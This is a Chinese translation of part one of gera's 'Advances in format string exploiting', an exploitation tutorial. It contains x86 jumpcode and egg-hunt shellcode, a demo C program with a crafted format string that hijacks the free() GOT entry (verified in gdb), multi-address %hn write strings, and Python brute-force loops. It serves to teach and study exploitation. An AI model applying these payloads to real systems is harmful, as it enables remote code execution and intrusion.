20CN网络安全小组 - 高级format string exploit技术P59-0x07(上)

您当前的位置 >> 首页

高级format string exploit技术P59-0x07(上)

/ns/hk/crack/data/20020824051518.htm

高级format string exploit技术P59-0x07(上)

原文: <<Advances in format string exploiting>>
by gera <gera@corest.com>, riq <riq@corest.com>
翻译整理by
alert7 < alert7@xfocus.org >
主页: http://www.xfocus.org/ http://www.whitecell.org/
yikaikai < yikaikai@sina.com >

第一部分：暴力破解格式化字符串
第二部分：利用堆(heap)字符串(in SPARC)

|=---------------=[ 第一部分: 暴力破解格式化字符串 ]=---------------=|
|=----------------------=[ gera <gera@corest.com> ]=---------------------=|

1 - 简介
2 - 32*32 == 32 - 使用跳转代码(jumpcodes)
2.1 - 在任何已知地方写入代码
2.2 - 其他地方的代码
2.3 - 没有可用的地址
3 - n倍加快
3.1 - 多地址覆盖
3.2 - 多参数暴力破解
4 - more greets and thanks
5 - References

前言：

本文原由whitecell论坛( http://www.whitecell.org/forums/ )yikaikai翻译的，可惜现在
他没有时间，就交由我来翻译了。不过还是要感谢yikaikai的辛苦翻译的前一段。

本文是讲如何暴力破解format sting的文章。本文讨论的东西使用于类似syslog format string
bug,就是不能利用format string bug得到反馈信息的情况。在可以利用format string bug得到反馈
信息的情况下，我们可以学习得到的信息。从而使我们的exploit更智能。具体请参考pappy@miscmag.com
写的，我翻译的<<如何写远程自动精确定位的format string exploit>>.
本文只是些idea,具体的实现就由你自己来写了.翻译的有点仓促，错误的地方有请各位斧正。

--[ 1. 简介

也许你在寻找关于format strings exploit的文章。你可以先看scut写的一篇很精彩关于
format strings的文章。

这篇文章是关于在使用exploit时可以加快暴力破解format stings时速度的两个小技巧。

"...暴力破解当然不是件快乐的事情，许多exploit的作者都讨厌的东西，人们想方设法的
使用其他方法来代替暴力破解"

感谢所有在这方面有灵感的人们，特别是{MaXX, dvorak,Scrippie}, scut[], lg(zip)和 lorian+k.

--[ 2. 32*32 == 32 - 使用跳转代码

一个format strings的bug可以使往任何数据写到任何地方。作者把它称为write-anything-anywhere
权限。当你有了write-anything-anywhere权限后，在这，描述了一些方法，比如说利用format string
bug改写strcpy()函数的目的指针，free()函数的参数变量和溢出ret2memcpy缓冲(倒，这个具体指什么？)等等。

Scut[1], shock[2], 和其他一些人阐述了在拥有write-anything-anywhere权限时几种方法
来hook程序的执行流程。例如修改GOT，修改函数指针，修改atexit结构，类的虚拟函数指针等等。当你
想这样做的时候，你必须知道或者预测出两个不同的地址:函数指针地址和shellcode的地址。如果你
要盲目的暴力破解的话，你需要猜测64位。其实也用不了这么多，GOT地址总是开始于0x0804地址，你
的代码总是开始于0x0805...对Linux的确是这样的，所以不是64位，而是32位。所以你只需猜测
4,294,967,296次了...你可能想到办法提供4k的nops，这样的话，你就可以每次跳4k，这样就减少到了
1,048,576次。还有GOT数组每个元素大小是4字节, 剩下了262,144...呵呵,即使是最小的那个
262,144对远程的来说话，还是太大了(对本地的可能还好说点)。

有时候我们可以使用些其他的技术，如果我们有读权限的话我们可以在目标进程读出些东西来学习，
或者把写权限变成读权限，或者使用大量的nops指令，或者使用目标stack，或者只是硬编码地址值。
等等随你高兴使用。

你还可以做更多的事情，因为你不是被限制只能写4字节，你可以把你的 shellcode写到任意的
地址去。

其实知道熟悉format strings bug的人都会想到这个---把shellcode写到任意的地址去。
(如果有类试的代码
for (;;)
printf(buf);
)
关于这个我也写过一篇拙作<<绕过libsafe的保护--覆盖_dl_lookup_versioned_symbol技术>>,
其中也展现了一种新的技术--覆盖_dl_lookup_versioned_symbol技术。从此，在控制获得程序控制权
方面又多了种方法。

再总结下几种方法：
1. 覆盖GOT
2. 利用DTORS
3. 利用 C library hooks
4. 利用 atexit 结构(静态编译版本才行)
5. 覆盖函数指针
6. 覆盖jmpbuf's
7. 覆盖dl_lookup_versioned_symbol

其实覆盖dl_lookup_versioned_symbol也是覆盖GOT技术,只不过是ld的GOT

----[ 2.1 在任何已知地方写入代码

只要存在format string bug,你就可以把任何东西写到内存的不同地方，所以你可以选择
已知的可写的地址。例如0x8051234，我们可以把代码写在这个地方，然后修改函数指针(GOT,atexit
结构等等)让他们指向它:

GOT[read]: 0x8051234 ; of course using read is just
; an example

0x8051234: shellcode

现在，shellcode的地址是我们指定的，总是0x8051234,因此你只要暴力破解修改
函数指针地址，在最坏的情况你将暴力破解这15位。这个量也是非常大的。

你利用format string使用这种技术的时候可能不能写一个200字节的shellcode(你可以吗？)，
也许你只能写一个30字节的shellcode，也可能你只能写几个字节...所以，我们就需要一个
跳转代码(jumpcode).

----[ 2.2 其他地方的代码

我相信你能够将一些代码放到目标进程的任何地址内存中。假如是这种情况的话，我们就需要
一段跳转代码(jmpcode)来定位shellcode并且跳到那里。做点这个是比较简单的，只需一点小的技术。

如果shellcode在堆栈的某处, 假如当跳转代码执行的时候，你大概知道shellcode离
SP有多远的话，你就可以跳到SP+8或+5字节的地方:

GOT[read]: 0x8051234

0x8051234: add $0x200, %esp ; delta from SP to code
jmp *%esp ; just use esp if you can

esp+0x200: nops... ; just in case delta is
; not really constant
real shellcode ; this is not writen using
; the format string

那么假如shellcode代码在堆(heap)中呢？你有没有好的想法呢？以下想法来自Kato
(这个版本是18 bytes, Kato's 版本较长一些，他没有使用format string):

GOT[read]: 0x8051234

0x8051234: cld
mov $0x4f54414a,%eax ; so it doesn find
inc %eax ; itself (tx juliano)
mov $0x804fff0, %edi ; is it low enough?
; make it lower
repne scasl
jcxz .-2 ; keep searching!
jmp *$edi ; upper case letters
; are ok opcodes.

somewhere
in heap: KATO ; if you know the alignment

KKATO ; one is enough, otherwise
KKATO ; make some be found
KKATO
real shellcode

假如在stack中，你又不知道它确切在哪里呢？(10bytes)

GOT[read]: 0x8051234

0x8051234: mov $0x4f54414a,%ebx ; so it doesn find
inc %ebx ; itself (tx juliano)
pop %eax //把read的参数pop出来
cmp %ebx, %eax
jnz .-2
jmp *$esp

somewhere
in stack: KATO ; you'll know the alignment
real shellcode

在其他地方呢? OK，你可以自己构造你的jmpcode代码 :-) 不过要小心， 'KATO'也许不是个
很好构造的string,因为它的执行可能带来些副作用. :-)

--| 友好(friendly)函数 |--

当你修改了GOT，让他指向你的函数，然后就可以做些手脚了。例如，假如你改变了函数指针，
free()函数的参数又指向shellcode的buffer，我们就只需要这样做:(2 bytes)

GOT[free]: 0x8051234 ; using free this time

0x8051234: pop %eax ; discarding real ret addr
ret ; jump to free's argument

同样地有read()和syslog还有一些其他函数...不同的是，可能你需要一些稍微复杂点的跳转代码:
(7 or 10 bytes)
GOT[syslog]: 0x8051234 ; using syslog

0x8051234: pop %eax ; discarding real ret addr
pop %eax
add $0x50, %eax ; skip some non-code bytes
jmp *$eax

如果没有其他的方法可行，但是你可以区分crash和挂起(hung)，你可以用一个无限循环来使
目标机挂起(hung):你可以暴力破解GOT的地址直到服务器挂起，然后你就知道GOT的正确位置了，
接着就可以暴力破解shellcode的地址了。

GOT[exit]: 0x8051234

0x8051234: jmp . ; infinite loop

----[ 2.3 没有可有的地址

作者不喜欢选用任意的地址，例如0x8051234,他使用了稍微不同的方法

GOT[free]: &GOT[free]+4 ; point it to the next 4 bytes
jumpcode ; address is GOT[free]+4

你不知道GOT[exit]的地址，但是在暴力破解的时候我们假设已经知道，然后使它指向下4个字节。
在那里放置jumpcode.例如，假设GOT[exit]在0x80490994,那么你的跳转代码是0x8049098,
然后你就必须把值0x8049098写入地址0x8049094中。这样的话，当运行exit()的时候就会跳到
0x8049098执行：

/* fstring.c *
* demo program to show format strings techinques *
* specially crafted to feed your brain by gera@corest.com */

int main() {
char buf[1000];

strcpy(buf,
"\x88\x96\x04\x08" // GOT[free]'s address,这是在我的机子上的地址
"\x8a\x96\x04\x08" //
"\x8c\x96\x04\x08" // jumpcode address (2 byte for the demo)
"%.38528u" // complete to 0x968c (0x968c-3*4)
"%4$hn" // write 0x968a to 0x8049688
"%.29048u" // complete to 0x10804 (0x10804-0x968c)
"%5$hn" // write 0x0804 to 0x804968a
"%.47956u" // complete to 0x1c358 (0x1c358-0x10804)
"%6$hn" // write 0xc35b (pop - ret) to 0x804968c
);

printf(buf);
free(buf);//alert7 add
}

[alert7@redhat73 alert7]$ gcc -o fstring fstring.c
[alert7@redhat73 alert7]$ gdb fstring -q
(gdb) br main
Breakpoint 1 at 0x8048479
(gdb) r
Starting program: /home/alert7/fstring
Breakpoint 1, 0x08048479 in main ()
(gdb) disass main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %esp,%ebp
0x8048473 <main+3>: sub $0x3f8,%esp
0x8048479 <main+9>: sub $0x8,%esp
0x804847c <main+12>: push $0x8048540
0x8048481 <main+17>: lea 0xfffffc08(%ebp),%eax
0x8048487 <main+23>: push %eax
0x8048488 <main+24>: call 0x8048358 <strcpy>
0x804848d <main+29>: add $0x10,%esp
0x8048490 <main+32>: sub $0xc,%esp
0x8048493 <main+35>: lea 0xfffffc08(%ebp),%eax
0x8048499 <main+41>: push %eax
0x804849a <main+42>: call 0x8048338 <printf>
0x804849f <main+47>: add $0x10,%esp
0x80484a2 <main+50>: sub $0xc,%esp
0x80484a5 <main+53>: lea 0xfffffc08(%ebp),%eax
0x80484ab <main+59>: push %eax
0x80484ac <main+60>: call 0x8048348 <free>
0x80484b1 <main+65>: add $0x10,%esp
(gdb) b * 0x80484ac
Breakpoint 2 at 0x80484ac
(gdb) c
...
00000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000
Breakpoint 2, 0x080484ac in main ()
(gdb) x/x 0x8049688
0x8049688 <_GLOBAL_OFFSET_TABLE_+28>: 0x0804968c
(gdb) x/2i 0x0804968c
0x804968c <_GLOBAL_OFFSET_TABLE_+32>: pop %eax
0x804968d <_GLOBAL_OFFSET_TABLE_+33>: ret
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffff720 in ?? ()

ok,已经跳到了buf执行了。

一开始作者没有加free(buf)，程序里就没有用到free函数，free函数是不会出现在GOT中的。
在例子中，GOT[free]地址是0x8049688, 我们使用 format string bug就把GOT[free]
的值改成了0x0804968c，下次free()被调用时就转到0x0804968c去执行了.

最后一种方法有另一个好处，它不仅可以用于format string---每次写入不同地址，
而且更可以在具有write-anything-anywhere权限的时候使用。就像覆盖strcpy()函数的目的指针
一样或者是一个ret2memcpy的buffer溢出。假如你足够聪明幸运的话，你自己把这技术应用到
单free()bug( free(buf)时候，buf的chunk可又用户控制).

--[ 3. n倍加快

----[ 3.1 - 多地址覆盖

如果你能写的多多于4个bytes的话, 你不仅可以将shellcode或jumpcode放到你想要放
的地方，而且可以在同时改变多个指针，再次加快破解速度。

当然这还需要有write-anything-anywhere权限，这就允许我们一次写不止4bytes。以下有
种使用format strings的简单方法来把同样的值写到所有的指针。

假设我们使用下面的格式化字符串在0x08049094地址写入0x12345678：

"\x94\x90\x04\x08" // the address to write the first 2 bytes
"AAAA" // space for 2nd %.u
"\x96\x90\x04\x08" // the address for the next 2 bytes
"%08x%08x%08x%08x%08x%08x" // pop 6 arguments
"%.22076u" // complete to 0x5678 (0x5678-4-4-4-6*8)
"%hn" // write 0x5678 to 0x8049094
"%.48060u" // complete to 0x11234 (0x11234-0x5678)
"%hn" // write 0x1234 to 0x8049096

因为%hn不向output string加字符，所以我们能够在不用使用padding的情况下把同一个值
写入几个不同的地方。例如，就象下面的format string,把值0x12345678写入了开始于地址0x8049094
的五个连续地址：

"\x94\x90\x04\x08" // addresses where to write 0x5678
"\x98\x90\x04\x08" //
"\x9c\x90\x04\x08" //
"\xa0\x90\x04\x08" //
"\xa4\x90\x04\x08" //
"AAAA" // space for 2nd %.u
"\x96\x90\x04\x08" // addresses for 0x1234
"\x9a\x90\x04\x08" //
"\x9e\x90\x04\x08" //
"\xa2\x90\x04\x08" //
"\xa6\x90\x04\x08" //
"%08x%08x%08x%08x%08x%08x" // pop 6 arguments
"%.22044u" // complete to 0x5678: 0x5678-(5+1+5)*4-6*8
"%hn" // write 0x5678 to 0x8049094
"%hn" // write 0x5678 to 0x8049098
"%hn" // write 0x5678 to 0x804909c
"%hn" // write 0x5678 to 0x80490a0
"%hn" // write 0x5678 to 0x80490a4
"%.48060u" // complete to 0x11234 (0x11234-0x5678)
"%hn" // write 0x1234 to 0x8049096
"%hn" // write 0x1234 to 0x804909a
"%hn" // write 0x1234 to 0x804909e
"%hn" // write 0x1234 to 0x80490a2
"%hn" // write 0x1234 to 0x80490a6

或者等同于使用$的情况

"\x94\x90\x04\x08" // addresses where to write 0x5678
"\x98\x90\x04\x08" //
"\x9c\x90\x04\x08" //
"\xa0\x90\x04\x08" //
"\xa4\x90\x04\x08" //
"\x96\x90\x04\x08" // addresses for 0x1234
"\x9a\x90\x04\x08" //
"\x9e\x90\x04\x08" //
"\xa2\x90\x04\x08" //
"\xa6\x90\x04\x08" //
"%.22096u" // complete to 0x5678 (0x5678-5*4-5*4)
"%8$hn" // write 0x5678 to 0x8049094
"%9$hn" // write 0x5678 to 0x8049098
"%10$hn" // write 0x5678 to 0x804909c
"%11$hn" // write 0x5678 to 0x80490a0
"%12$hn" // write 0x5678 to 0x80490a4
"%.48060u" // complete to 0x11234 (0x11234-0x5678)
"%13$hn" // write 0x1234 to 0x8049096
"%14$hn" // write 0x1234 to 0x804909a
"%15$hn" // write 0x1234 to 0x804909e
"%16$hn" // write 0x1234 to 0x80490a2
"%17$hn" // write 0x1234 to 0x80490a6

这个例子中，一次改写了五个“函数指针”，当然也可以改写更多。真正的限制是你能提供多长的字符串,
假如你不直接使用参数(就是不使用$hn情况)的话，你还要考虑为了得到要写的地址，你需要确定pop多少个参数。
一般直接使用参数访问是有限制(Solaris's 库是30, 有些Linuxes 是400, 也许还有其他的值)。

如果你想将jumpcode和多地址覆盖技术结合起来的话，你必须记住跳转代码(jumpcode)不是在
函数指针的后面的4个bytes, 而是更远，这起决于你想一次覆盖多少个地址。

----[ 3.2 - 多参数暴力破解

有时候你不知道需要pop多少个参数，或者使用$hn的时候你不知道需要直接跳多少参数，所以你需要尝试直到
得到正确的数值. 有些时候我们没有更好的方法, 特别是在非盲目暴力破解format string bug的时候。
但是无论如何, 你可能会碰到不知道要pop多少个参数的情况，我们可以使用下面这个例子把它找出来。

pops = 8
worked = 0
while (not worked):
fstring = "\x94\x90\x04\x08" # GOT[free]'s address
fstring += "\x96\x90\x04\x08" #
fstring += "\x98\x90\x04\x08" # jumpcode address
fstring += "%.37004u" # complete to 0x9098
fstring += "%%%d$hn" % pops # write 0x9098 to 0x8049094
fstring += "%.30572u" # complete to 0x10804
fstring += "%%%d$hn" % (pops+1) # write 0x0804 to 0x8049096
fstring += "%.47956u" # complete to 0x1c358
fstring += "%%%d$hn" % (pops+2) # write (pop - ret) to 0x8049098
worked = try_with(fstring)
pops += 1

这个例子中, 我们使用递增变量'pops'方法来找到合适的值(使用直接参数访问)。假如我们重复多次
使用目标地址，我们就可以使pops变量增长的更快。例如，我们可以重复每个地址5次，这样我们就可以
加快暴力破解的速度了。

pops = 8
worked = 0
while (not worked):
fstring = "\x94\x90\x04\x08" * 5 # GOT[free]'s address
fstring += "\x96\x90\x04\x08" * 5 # repeat eddress 5 times
fstring += "\x98\x90\x04\x08" * 5 # jumpcode address
fstring += "%.37004u" # complete to 0x9098
fstring += "%%%d$hn" % pops # write 0x9098 to 0x8049094
fstring += "%.30572u" # complete to 0x10804
fstring += "%%%d$hn" % (pops+6) # write 0x0804 to 0x8049096
fstring += "%.47956u" # complete to 0x1c358
fstring += "%%%d$hn" % (pops+11) # write (pop - ret) to 0x8049098
worked = try_with(fstring)
pops += 5

找到5个中任何一个随机的拷贝就可以了，越多的拷贝速度越快

这是一个简单的想法，只是重复覆盖地址。如果你有什么疑问，可以用笔和纸画画计算下，
先画出放有format string的stack，再把一些随机参数放在堆栈顶，然后手动开始暴力破解...

这看起来很傻但也许有天会帮上你, 你永远不可能知道。当然了, 不直接参数访问
也可以同样做到。但是比较复杂了，因为每次你必须要重新计算%.u的长度。

--[ 未命名和未列出的部分

通过这篇文章, 我的观点是：format string可以做到的比具有4-bytes-write-anything-anywhere
权限的多，它是可以把任意多的字节写到任何地址（也就是说具有full write-anything-anywhre权限),
这会给我们更多的可能。

好了，文章就写到这里，剩下的就由你来完成了。

--[ 4. more greets and thanks

riq, for trying every stupid idea I have and making it real!

juliano, for being our format strings guru.

Impact, for forcing me to spend time thinking about all theese amazing
things.

--[ 5. references

[1] Exploiting Format String Vulnerability, scut's.
March 2001. http://www.team-teso.net/articles/formatstring

[2] w00w00 on Heap Overflows, Matt Conover (shok) and w00w00 Security Team.
January 1999. http://www.w00w00.org/articles.html

[3] Juliano's badc0ded
http://community.corest.com/~juliano

[4] Google the oracle.
http://www.google.com